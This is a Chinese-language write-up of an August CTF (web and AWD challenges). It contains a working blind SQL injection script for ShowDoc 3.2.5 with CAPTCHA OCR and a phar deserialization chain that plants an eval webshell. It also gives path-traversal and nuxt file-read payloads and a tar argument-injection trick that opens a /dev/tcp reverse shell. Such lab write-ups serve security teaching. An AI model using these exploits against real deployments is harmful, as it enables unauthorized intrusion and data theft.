掌控安全CTF - 8月（WEB&AWD方向）

文章目录

好久没更新了，水一篇。

0x01 Web

1. web-php

题目代码如下：

<?phpshow_source(__FILE__);file($_POST['a']);?>

老演员了，涉及PHP filter文件读取攻击，参考：PHP Filter链——基于oracle的文件读取攻击 ， 提示 flag 在 /flag 上，脚本一把梭。

2. web2

showdoc，跟着某些文章复现即可，我这个地方从暴破 token 到 phar 反序列化完整地走了一篇，就当复习知识点了。暴破 token 脚本如下：

import argparse
import ddddocr
import requests
import onnxruntime
from urllib.parse import urljoin

onnxruntime.set_default_logger_severity(3)
table ='0123456789abcdef'
proxies ={'http':'http://127.0.0.1:8085'}
headers ={'Authorization':'Basic emthcTp6a2Fx'}
ocr = ddddocr.DdddOcr()
ocr.set_ranges(table)classRetryException(Exception):passdefretry_when_failed(func):defretry_func(*args,**kwargs):whileTrue:try:return func(*args,**kwargs)except RetryException:continueexcept Exception as e:raise e

    return retry_func

defgenerate_captcha(base:str):
    data = requests.get(f"{base}?s=/api/common/createCaptcha", headers=headers).json()
    captcha_id = data['data']['captcha_id']
    response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}', headers=headers)
    data = response.content
    result = ocr.classification(data)return captcha_id, result

@retry_when_faileddefexploit_one(base:str, current:str, ch:str)->str:
    captcha_id, captcha_text = generate_captcha(base)
    data = requests.get(base, params={'s':'/api/item/pwd','page_id':'0','password':'1','captcha_id': captcha_id,'captcha': captcha_text,'item_id':f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "}, headers=headers).json()if data['error_code']==0:return ch
    elif data['error_code']==10010:return''elif data['error_code']==10206:raise RetryException()else:print(f'error: {data!r}')raise Exception('unknown exception')defmain():
    parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
    parser.add_argument('-u','--url',type=str, required=True)

    args = parser.parse_args()
    target = urljoin(args.url,'/server/index.php')
    res =''for i inrange(64):
        r =''for ch inlist(table):
            r = exploit_one(target, res, ch)if r:
                res += ch
                breakprint(f'Current result: {res}')ifnot r:breakif __name__ =='__main__':
    main()

运行结果如下：
然后配合 user_token 打前台反序列化，phar poc如下：

<?phpnamespaceGuzzleHttp\Cookie{classSetCookie{private$data=[];publicfunction__construct(){$this->data=array("Discard"=>false,"poc"=>'<?php eval($_REQUEST[0]);?>');}}classCookieJar{/** @var SetCookie[] Loaded cookie data */private$cookies=[];publicfunction__construct(){$this->cookies=[newSetCookie()];}}classFileCookieJarextendsCookieJar{/** @var string filename */private$filename;/** @var bool Control whether to persist session cookies or not. */private$storeSessionCookies;publicfunction__construct($cookieFile,$storeSessionCookies=false){parent::__construct();$this->filename=$cookieFile;$this->storeSessionCookies=$storeSessionCookies;}}}namespace{$exampleWithClosure=newGuzzleHttp\Cookie\FileCookieJar("/var/www/html/Public/Uploads/shell.php",true);$phar=newphar('image.phar',0);$phar->startBuffering();$phar->setMetadata($exampleWithClosure);$phar->setStub('GIF89a<?php __HALT_COMPILER();?>');$phar->addFromString("test.txt","test");$phar->stopBuffering();}

运行上述php脚本后，就已经拿到了token以及phar文件。然后修改该phar文件后缀为jpg，同时构造本地文件上传表单，上传phar文件到对应的网站。

<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1.0"><title>Form Upload</title></head><body><formaction="http://dyvfgrqa.lab.aqlab.cn/server/index.php?s=/api/page/upload"method="post"enctype="multipart/form-data"><inputtype="hidden"name="user_token"value="5d302c5281dc08432a2e8d0ce47d832b074dc5f9f461720078cbfb26b667e463"><labelfor="file">Choose file to upload:</label><inputtype="file"name="file"id="file"><br><br><inputtype="submit"value="Upload"></form></body></html>

上传后会返回 sign，如图：
访问对应的路径获取phar文件路径，如图：
访问phar文件路径，webshell被生成。

验证webshell有效性。
获取flag，如图：

3. Just A Index

aiohttp/3.9.1

中存在路径遍历漏洞，只需要找准一个基础路径，利用

../

遍历即可。参考：CVE-2024-23334 aiohttp路径遍历漏洞 ，可以看到页面种加载了一张图片，路径是：

/img/what.jpeg

，可以基于

/img

进行路径遍历，如图：

0x02 AWD

1. Nothing

给了一个附件，从附件中可以分析出前端使用了 nuxt 框架，存在文件读取漏洞，PoC如下：

GET /_nuxt/@fs/etc/passwd HTTP/1.1
Host: example.com

获取flag，如图：

2. Scan

调用 nuclei 对目标网站进行扫描，给了附件，部分代码如下：

import flask
import subprocess
import re

app = Flask(__name__)[email protected]('/submit', methods=['POST'])defsubmit():......if url isNone:return"No URL！ ",400ifnot url_pattern.match(url):return"URL格式错误！",400if url:
        command =['./nuclei','--silent','-u', url,'-t','0day-templates.yaml']try:
            result = subprocess.run(command, capture_output=True, text=True)print(result.stdout)if'info'in result.stdout and'/api/v2/echo'in result.stdout and'custom-templates'in result.stdout:return flag
            else:return"非常安全，没有问题！"except subprocess.CalledProcessError:return"Error occurred while running command"return"Invalid request"if __name__ =='__main__':......

0day-templates.yaml文件内容如下：

这个地方直接用自己 vps伪造一个符合扫描规则的页面即可，代码如下：

from fastapi import FastAPI, Request

app = FastAPI()@app.get('/api/v1/version/')defapi_version():
    response ={"version":"10.0.3","NAME":"HACKER","msg":"success"}return response

@app.get('/api/v2/echo/')asyncdefapi_echo(request: Request):return"zkaq{a} <script>alert(1111)</script>"if __name__ =='__main__':import uvicorn
    uvicorn.run(app, host="0.0.0.0", port=8081)

扫描结果如下：

3. 压缩打包站

上传文件后，后端会存储用户的文件并将其打包并提供压缩包下载功能。给了附件，部分代码如下：

from flask import Flask, g, render_template, request, redirect, make_response, send_file, after_this_request
import uuid, os

app = Flask(__name__)@app.before_requestdefcheck_uuid():
    uuid_cookie = request.cookies.get('uuid',None)if uuid_cookie isNone:
        response = make_response(redirect('/'))
        response.set_cookie('uuid',str(uuid.uuid4()))return response
    
    try:
        uuid.UUID(uuid_cookie)except ValueError:
        response = make_response(redirect('/'))
        response.set_cookie('uuid',str(uuid.uuid4()))return response
    
    g.uuid = uuid_cookie

    ifnot os.path.exists(f'uploads/{g.uuid}'):
        os.mkdir(f'uploads/{g.uuid}')@app.route('/', methods=['GET'])defmain():return render_template('index.html', files=os.listdir(f'uploads/{g.uuid}'))@app.route('/api/upload', methods=['POST'])defupload():file= request.files.get('file',None)iffileisNone:return'No file provided',400# check for path traversalif'..'infile.filename or'/'infile.filename:return'Invalid file name',400# check file sizeiflen(file.read())>1000:return'File too large',400file.save(f'uploads/{g.uuid}/{file.filename}')return'Success! <script>setTimeout(function() {window.location="/"}, 3000)</script>',[email protected]('/api/download', methods=['GET'])defdownload():@after_this_requestdefremove_file(response):
        os.system(f"rm -rf uploads/{g.uuid}/out.tar")return response

    # make a tar of all files
    os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")# send tar to userreturn send_file(f"uploads/{g.uuid}/out.tar", as_attachment=True, download_name='download.tar', mimetype='application/octet-stream')if __name__ =="__main__":
    app.run(host='0.0.0.0', port=2024, threaded=True)

漏洞触发点，关键在于：

os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")

此处涉及

tar

参数注入操作，具体原理参考：tar参数注入 ，构造文件命令如下：

echo 'bash -c "bash -i >& /dev/tcp/1.1.1.1/10086 0>&1"' | base64
echo "" > "--checkpoint-action=exec=echo [base64_reverseshell_payload] | base64 -d | bash" # 生成第一个文件
echo "" > --checkpoint=1 # 生成第二个文件
echo "" > test.txt # 生成第三个文件

将三个文件分别上传，然后点击页面中的 download 下载压缩包。

vps吃到反弹shell，获取flag。